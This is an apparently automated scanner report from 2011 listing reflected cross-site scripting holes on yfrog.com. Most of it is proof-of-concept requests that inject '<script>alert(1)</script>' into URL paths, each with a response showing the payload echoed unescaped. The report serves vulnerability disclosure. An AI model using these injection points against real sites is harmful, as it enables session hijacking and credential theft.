XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, yfrog.com

Report generated by XSS.CX at Thu Aug 18 15:53:54 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in yfrog.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://yfrog.com/css/carousel.css [REST URL parameter 1]

1.2. http://yfrog.com/css/common.css [REST URL parameter 1]

1.3. http://yfrog.com/css/home.css [REST URL parameter 1]

1.4. http://yfrog.com/favicon.ico [REST URL parameter 1]

1.5. http://yfrog.com/feed/carousel [REST URL parameter 1]

1.6. http://yfrog.com/feed/carousel [REST URL parameter 2]

1.7. http://yfrog.com/feed/recent_celebs.json [REST URL parameter 1]

1.8. http://yfrog.com/feed/recent_celebs.json [REST URL parameter 2]

1.9. http://yfrog.com/feed/recent_uploaders_v2.json [REST URL parameter 1]

1.10. http://yfrog.com/feed/recent_uploaders_v2.json [REST URL parameter 2]

1.11. http://yfrog.com/flash/jwplayer/jwplayer-5.7.js [REST URL parameter 1]

1.12. http://yfrog.com/js/EventLogger.js [REST URL parameter 1]

1.13. http://yfrog.com/js/Utils.js [REST URL parameter 1]

1.14. http://yfrog.com/js/carousel.js [REST URL parameter 1]

1.15. http://yfrog.com/js/common.js [REST URL parameter 1]

1.16. http://yfrog.com/js/home.js [REST URL parameter 1]

1.17. http://yfrog.com/js/jquery/jquery-1.4.2.min.js [REST URL parameter 1]

1.18. http://yfrog.com/js/jquery/jquery-1.6.min.js [REST URL parameter 1]

1.19. http://yfrog.com/js/jquery/jquery.jcarousel.min.js [REST URL parameter 1]

1.20. http://yfrog.com/js/jquery/jquery.li-scroller.js [REST URL parameter 1]

1.21. http://yfrog.com/js/swfobject.js [REST URL parameter 1]

1.22. http://yfrog.com/user/avatars.json [REST URL parameter 1]

1.23. http://yfrog.com/user/avatars.json [REST URL parameter 2]

1.24. http://yfrog.com/user/avatars.json [screen_names%5B%5D parameter]

2. Cookie without HttpOnly flag set

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://yfrog.com/

4.2. http://yfrog.com/popular/

5. File upload functionality

6. HTML does not specify charset

7. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 24 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://yfrog.com/css/carousel.css [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /css/carousel.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c21b5<script>alert(1)</script>b711b1fae81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc21b5<script>alert(1)</script>b711b1fae81/carousel.css?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/feed/carousel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:04 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find cssc21b5<script>alert(1)</script>b711b1fae81</h2>
...[SNIP]...

1.2. http://yfrog.com/css/common.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e942<script>alert(1)</script>acef8fc52c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css4e942<script>alert(1)</script>acef8fc52c9/common.css?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:43 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16610

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find css4e942<script>alert(1)</script>acef8fc52c9</h2>
...[SNIP]...

1.3. http://yfrog.com/css/home.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2eea<script>alert(1)</script>0c195cf62bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa2eea<script>alert(1)</script>0c195cf62bd/home.css?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:42 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16610

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find cssa2eea<script>alert(1)</script>0c195cf62bd</h2>
...[SNIP]...

1.4. http://yfrog.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f22ac<script>alert(1)</script>fdf42d6537c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof22ac<script>alert(1)</script>fdf42d6537c HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:44:06 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16626

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find favicon.icof22ac<script>alert(1)</script>fdf42d6537c</h2>
...[SNIP]...

1.5. http://yfrog.com/feed/carousel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /feed/carousel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 709be<script>alert(1)</script>b050d98de4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feed709be<script>alert(1)</script>b050d98de4d/carousel HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.0.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find feed709be<script>alert(1)</script>b050d98de4d</h2>
...[SNIP]...

1.6. http://yfrog.com/feed/carousel [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://yfrog.com
Path:   /feed/carousel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f9b6<a>0c54f916bfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /feed/carousel6f9b6<a>0c54f916bfa HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.0.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16637

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Specified action, 'carousel6f9b6<a>0c54f916bfaAction' could not be found</h2>
...[SNIP]...

1.7. http://yfrog.com/feed/recent_celebs.json [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /feed/recent_celebs.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3b72<script>alert(1)</script>3008d7667f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedf3b72<script>alert(1)</script>3008d7667f4/recent_celebs.json?type=recent_celebs HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find feedf3b72<script>alert(1)</script>3008d7667f4</h2>
...[SNIP]...

1.8. http://yfrog.com/feed/recent_celebs.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://yfrog.com
Path:   /feed/recent_celebs.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10a7c<a>e94af9c2d63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /feed/10a7c<a>e94af9c2d63?type=recent_celebs HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:30 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16645

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Specified action, '10a7c<a>e94af9c2d63Action' could not be found</h2>
...[SNIP]...

1.9. http://yfrog.com/feed/recent_uploaders_v2.json [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /feed/recent_uploaders_v2.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 40191<script>alert(1)</script>e2dd231c7fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feed40191<script>alert(1)</script>e2dd231c7fc/recent_uploaders_v2.json HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find feed40191<script>alert(1)</script>e2dd231c7fc</h2>
...[SNIP]...

1.10. http://yfrog.com/feed/recent_uploaders_v2.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://yfrog.com
Path:   /feed/recent_uploaders_v2.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9225<a>abe9ed49c03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /feed/e9225<a>abe9ed49c03 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:30 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Specified action, 'e9225<a>abe9ed49c03Action' could not be found</h2>
...[SNIP]...

1.11. http://yfrog.com/flash/jwplayer/jwplayer-5.7.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /flash/jwplayer/jwplayer-5.7.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20bf0<script>alert(1)</script>137684fe202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash20bf0<script>alert(1)</script>137684fe202/jwplayer/jwplayer-5.7.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:16 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16614

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find flash20bf0<script>alert(1)</script>137684fe202</h2>
...[SNIP]...

1.12. http://yfrog.com/js/EventLogger.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/EventLogger.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0387<script>alert(1)</script>c67214a8370 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa0387<script>alert(1)</script>c67214a8370/EventLogger.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find jsa0387<script>alert(1)</script>c67214a8370</h2>
...[SNIP]...

1.13. http://yfrog.com/js/Utils.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/Utils.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 63468<script>alert(1)</script>6d1c3917aa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js63468<script>alert(1)</script>6d1c3917aa5/Utils.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find js63468<script>alert(1)</script>6d1c3917aa5</h2>
...[SNIP]...

1.14. http://yfrog.com/js/carousel.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/carousel.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93b7<script>alert(1)</script>bb9bf563bad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jse93b7<script>alert(1)</script>bb9bf563bad/carousel.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/feed/carousel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:05 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find jse93b7<script>alert(1)</script>bb9bf563bad</h2>
...[SNIP]...

1.15. http://yfrog.com/js/common.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
